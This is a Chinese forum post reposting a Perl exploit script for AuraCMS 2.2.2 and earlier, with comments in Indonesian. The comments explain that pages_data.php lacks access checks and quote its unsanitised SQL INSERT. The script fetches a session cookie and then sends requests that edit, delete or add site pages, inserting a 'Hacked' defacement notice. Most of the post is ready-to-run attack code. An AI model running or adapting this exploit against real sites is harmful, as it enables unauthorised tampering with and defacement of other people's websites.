• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    AuraCMS

    发布者: 浪子 | 发布时间: 2025-6-28 22:47| 查看数: 114| 评论数: 0|帖子模式

    #!/usr/bin/perl
    # k1tk4t Public Security Advisory
    # ////////////////////////////////////////////////////////////
    # AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit
    # Vendor : http://www.auracms.org/
    # Kutu : ./js/pages/pages_data.php
    # Keterangan :
    # pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level
    # dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini?
    # karena didalam berkas ini terdapat kode yang dapat menghapus(delete)
    # menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga
    # dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini
    # maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee.....   
    # potongan kode dari pages_data.php
    # --//--
    # 03: @ob_start('ob_gzhandler');
    # 04: @header("Content-type: text/plain; charset=utf-8;");
    # 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
    # 06: @header("ragma: no-cache");
    # 07:
    # 08: include '../../includes/session.php';
    # 09: include '../../includes/config.php';
    # 10: include '../../includes/fungsi.php';
    # 11: include '../../includes/mysql.php';
    # 12: include '../../includes/json.php';
    # 13:
    # 14:
    # 15: if (!isset($_SESSION['mod_ajax'])){
    # 16: exit;   
    # 17: }
    # --//--
    # Lihat.... tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya
    # dalam mengakses berkas ini
    # --//--
    # 20: switch (@$_GET['action']){
    # 21:        
    # 22: case 'add':
    # 23: $_POST = array_map ('decodeURIComponent',$_POST);
    # 24: $judul = $_POST['judul'];
    # 25: $konten = $_POST['konten'];
    # 26: $open['error'] = false;
    # 27: $open['errorpesan'] = '';
    # 28: if (!empty($judul) && !empty($konten)){
    # 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')");
    # 30: if ($query){
    # --//--
    # diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan...
    # kacoooo, kacoooo,  
    # selebihnya liat sendiri yaa... panjang soalnya... :p
    #
    # Terimakasih untuk ;
    # str0ke,DNX,n0c0py,L41n,
    # NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
    # eCHo->[y3dips,K-159,lirva32,dan staff lainnya]
    use LWP::UserAgent;
    use HTTP::Cookies;
    use Getopt:ong;

    if ( !$ARGV[1] ) {
    print "\n ///////////////////////////////////////////////////////////";
    print "\n //                ..::> k1tk4t <::..                     //";
    print "\n //     AuraCMS <= 2.2.2 (pages_data.php)                 //";
    print "\n //     Arbitrary Edit/Add/Delete data halaman exploit    //";
    print "\n ///////////////////////////////////////////////////////////";
    print "\n[!] ";
    print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]";
    print "\n[!] Contoh     : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1";
    print "\n[!] Options : 1=Edit , 2=Delete, 3=Add";
    print "\n";
    exit;
    }
    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $idhalaman = $ARGV[2];
    my $isijudul = "AuraCMS <= 2.2.2 Hacked";
    my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman";
    my $ambilkue = "http://".$host.$path."index.php";
    my $browser = LWP::UserAgent->new;
    my $kue = HTTP::Cookies->new();
    my $hasil = "";
    %options = ();
    GetOptions(\%options, "o=i",);
    if($options{"o"} && $options{"o"} == 1) {
    $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id=";
    }
    if($options{"o"} && $options{"o"} == 2) {
    $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id=";
    }
    if($options{"o"} && $options{"o"} == 3) {
    $arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id=";
    }

    $hasil = $browser->get($arbitrary);
    if(!$hasil->is_success) {
    die("[!] Gagal, berkas pages_data.php tidak tersedia\n");
    }

    #  ambil kue dari website
    $hasil = $browser->get($ambilkue);
    $kue->extract_cookies($hasil);
    $browser->cookie_jar($kue);

    # arbitrary exploit
    $arbitrary .= $idhalaman;
    $hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
    $konten = $hasil->content;
    print $konten ;

    来源:https://www.jb51.net/hack/5646.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表